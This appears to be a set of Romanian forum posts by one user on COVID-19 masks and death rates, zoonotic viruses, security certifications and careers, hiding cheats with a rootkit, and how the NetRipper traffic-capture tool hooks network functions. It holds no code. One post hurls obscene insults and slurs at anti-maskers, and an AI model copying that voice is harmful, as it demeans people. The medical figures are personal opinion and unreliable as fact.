cred ca era necesar un act normativ, au declarat stare de urgenta. Nu era nevoie de un act normativ care sa zica ca e epidemie sau pandemie. Daca incepea un razboi ce mai faceau? Daca era un cutremur mare? Daca venea un uragan (unul adevarat, nu Tzanca Uraganul). Da, e extrem de daunatoare pentru economie, dar vietile omenesti sunt mai importante. Nici eu nu m-as stresa asa rau pentru persoane pe care nu le cunosc, dar ma stresez cand ma gandesc ca pe lista pot fi si rudele mele. La fel ca mai sus, pe bani pui mana sa platesti ceva, dar nu cred ca se apuca cineva sa mangaie plexiglasul. Bine, acum exista si copii care il pot linge si care mananca guma la mana a doua, nu ai cum sa previi totul. Toata lumea si toate economiile sunt afectate, toata planeta. Nu sunt tocmai expert in economie dar stiu si eu ca daca cineva se apuca sa printeze bani, valoarea acestora scade pentru ca "inflatie".

Date mai la zi: https://datelazi.ro/ - 160.000 de cazuri, 5600 de decese. Panica nu se justifica din acele 160.000 de cazuri ci din acele 5600 de decese. Care sunt multe pentru o boala care se transmite pe calea aerului. Aici da, e o problema si una grava si greu de rezolvat in practica, mai ales intr-o tara ca Romania cu un sistem medical la pamant. Faptul ca exista spitale Covid si non-Covid e un lucru bun. Bine, de ieri, in Bucuresti nu va mai fi cazul, toate spitalele trebuie sa asigure suport Covid. Dar ia-o altfel: daca o persoana cu o boala mai nasoala, gen diabet sau cancer, merge la spital si se infecteaza cu Covid, cum e? Si cum e daca se infecteaza medicii? Tu, sau voi, cum ati rezolva problema asta? Singura solutie la problema ar fi teste care sa dea extrem de rapid rezultate, dar nu prea exista. De fapt sunt, dar nu cu o rata de detectie buna. Au fost si stiri cum ca au murit multi in caminele de batrani. A fost vizitat, a avut contact cu un gardian, orice se poate. Eu port ore masca si nu mi se pare ca se umezeste. Cat despre umiditatea din aer, ajuta la faptul ca virusul sta mai putin in aer (plutind). Ce nu ajuta e frigul. Am fost ieri in Cora si la Mega Image, nu era aglomeratie. Am vazut insa tramvaie pline de oameni, acolo e nasol. La Sf. Parascheva problema e ca batraneii de acolo nu purtau masca si lingeau moastele, pe langa faptul ca se tineau in brate. Si mai si tipau fara masti. Dar sunt curios peste vreo 5-6 zile cum o sa fie. E putin scos din context. La TV sunt 2-3-5 persoane distantate. La piata sunt sute de oameni. Daca as avea de ales intre a merge la piata fara masca sau intr-un platou de televiziune, v-as face cu mana la camere. Da, au fost discrepante la inceput intre cei care credeau in Covid si cei care nu credeau. Insa acum au raman putine persoane care nu cred si nu isi fac griji pentru Covid si pe buna dreptate. Exemplu personal: mama. La inceput nu ii pasa, ca nu se intampla nimic, ca asta e. Acum nu mai pleaca fara masca. Concluzie personala: Nu e ceva extrem de grav dar este ceva totusi grav. Eu nu imi fac griji pentru mine si persoanele tinere ci pentru cei in varsta si cei cu probleme de sanatate. De exemplu cineva cu diabet. Eu port masca si pe strada, nu pentru mine ci pentru ceilalti. Cat despre cei care zic ca purtatul mastii le fura libertate si ca e o botnita: sa imi suga pula, sunt niste retardati cu IQ de maimuta. Ce nu inteleg ei e ca purtatul mastii nu e doar despre ei ci si despre ceilalti. Nu e ca centura de siguranta (care ca sa vezi, nu le fura libertate) care e utila doar pentru ei, actiunile lor ii afecteaza si pe cei din jur. E ca si cum as veni eu cu o boxa imensa in strada si as da manelele la maxim. E dreptul meu, nu? E libertatea mea! Ce, imi fura libertatea sa fac ce vreau? Sau sa ma cac pe strada. De ce nu am voie?

Nu inteleg exact la ce se refera acel document, care a fost cererea. Dar are sens, din punct de vedere juridic, ma gandesc. E normal ca o epidemie sa fie declarata la un anumit numar de cazuri sau de decese. Si documentul specifica doar ca MS nu a emis un act normativ, atat. Problema insa la Covid e ca se transmite prin aerosoli. Adica foarte usor, are o crestere exponentiala si nu exista vaccin (e.g. ca la bolile copilariei). Altfel spus, e un caz special care poate fi tratat diferit din punctul meu de vedere.

Statisticile alea sunt idioate. La noi in tara rata de deces e de 3% (per total!). Rata de deces la gripa sezoniera e de 0.1%. Faceti voi calculele. De fapt nu voi, ci retardatii care cred ca e o gluma. La varsta 50+ nu e nici pe departe cum apare in acel articol. PS: Mi-am comandat si o sa imi ajunga azi aceasta carte: https://www.editurajunimea.ro/produs/covid-19-dimensiuni-ale-gestionarii-pandemiei/ Am vazut un reportaj la Digi si era recomandata de catre https://ro.wikipedia.org/wiki/Alexandru-Vladimir_Ciurea (daca va e lene sa cititi, un medic neurochirurg cu peste 20.000 de operatii pe creier efectuate) care a scris un capitol acolo. Cu alte cuvinte, am mai multa incredere in ce zice Vlad Ciurea, decat in ce zice Karen pe cine stie ce site. Alegeti-va corect sursele de informare.

Eu am luat ceva carte de Security+ acum ceva timp, m-am uitat peste ea si mi-a placut ca acopera foarte multe lucruri, care sunt foarte utile pentru oricine lucreaza sau vrea sa lucreze in domeniul security. Nu stiu ce intrebari sunt la certificare dar eu valoarea pe care o vad in certificari e "trainingul" necesar ca cineva sa o ia, adica ceea ce invata pentru acea certificare.

Comptia Security+ e ok, nu prea stiu ce sa zic de altele ca nu sunt asa familiar cu ele.

Salut, teoretic poti face asta si din user-land, depinde de ce anume vrei sa il ascunzi. Dar cel mai probabil un anti-cheat adevarat are un kernel-mode driver si iti va trebui dupa cum zice si gigiRoman un kernel-mode driver care sa il ascunda, adica un rootkit. Sugestia mea ar fi sa nu folosesti cheat-uri, e mai simplu si mai "fun".

Teoretic se poate, practic e foarte greu pentru un atacator sa iti instaleze o aplicatie random in telefon, mai ales daca sistemul de operare e destul de updated. Sigur nu ai instalat vreo aplicatia ciudata? Sau direct APK? Telefonul era rootat? Ar trebui sa ii dai un reset to factory si sa ii faci update pentru siguranta. Partea cu bateria e ciudata, doar nu a venit atacatorul la tine acasa sa bage teleofnul in priza

Salut, pai trebuie sa te decizi mai intai daca vrei sa mergi pe partea de "offensive" (e.g. penetration testing) sau "defensive" (e.g. security analyst). Dar orice ar fi trebuie sa stii cate putin din fiecare: Windows, Linux, programare, protocoale (e.g. HTTP, SMTP), networking (e.g. TCP/IP), criptografie, HTML/JavaScript, SQL si cate ceva despre vulnerabilitati si cum sunt exploatate. Dupa ce ai toata baza neceara, poti decide ce iti place mai mult tinand desigur cont de "piata" din Romania, ce ti-ar oferi cele mai multe oportunitati si cel mai important: ce ti-ar placea mai mult sa faci.

Dintotdeauna a exista si mereu va exista schimb de virusi de la animale catre oameni si de la oameni catre animale. Rinovirusurile care in general provoaca raceala au plecat de la pasari la om. Gripa porcina si aviara au plecat de la oameni la animale. La fel se intampla si in cazul unor virusuri nasoale, Covid nu e asa nasol dar Ebola de exemplu este si provine de la maimute. Si de fapt problema nu e ca oamenii mananca animale. Problema, in cel mai rau caz, e daca sunt mancate nepreparate. De exemplu un virus foarte asemanator Ebola a ajuns la cercetatori din Germania care lucrat cu maimute transate, din sangele lor probabil. Cel mai probabil, din punctul meu de vedere, avantajul de a manca animale "domestice" este faptul ca oamenii interactioneaza cu ele de zeci de mii de ani si trecand prin diversi virusi de-a lungul timpului, omenirea a capatat imunitate buna. De asemenea, animalele sunt o sursa foarte buna de "vaccinuri". Variola care ucidea 30% dintre cei care erau infectati a fost eradicata cu ajutorul bovinelor. Exista si o variola bovina care la om nu provoca moartea (poate in proportie de 2%) si s-a descoperit observat ca laptaresele fac o forma mult mai usoara de variola, astfel, oamenii care erau infectati cu variola bovina faceau o forma mult mai usoara si capatau imunitate.

Daca vreti sa aflati mai multe va recomand: "O planeta plina de virusi". Am cumparat-o si am citit-o ieri, usor de inteles si acopera multe. Nu si Covid, ca e scrisa prin 2015 cred, dar toate celelalte virusuri comune.

Eu cred ca exista Java devs cu mai mult de 4K pe luna net, dar undeva peste 10 ani de experienta. Adica nu am de unde sa stiu salariul, dar iti cam poti da seama de diverse lucruri cand iti zic ce apartamente si case au

Teoretic ar trebui sa captureze, chiar daca nu decrypteaza. Adica toate apelurile de retea trec prin functiile send/WSASend (in principiu) si nu sunt plain-text, dar ar trebui sa fie capturate de NetRipper. Ce probabil se intampla e ca acel program creeaza un child process. In cazul asta, NetRipper nu e injectat acolo si nu are cum sa captureze nimic. Si nici un fix prea usor pentru asta nu am, adica ar trebui sa lucrez ceva la el sa ii adaug feature de auto inject in procese child. Incearca functia de auto monitor. De fapt nici nu stiu cat de utila ar fi ca nu e chiar 100% implementata. Cacat, chiar ar trebui sa-mi iau ceva timp sa mai lucrez la el, dar momentan nu am deloc, dupa RST Con o sa fac cate ceva.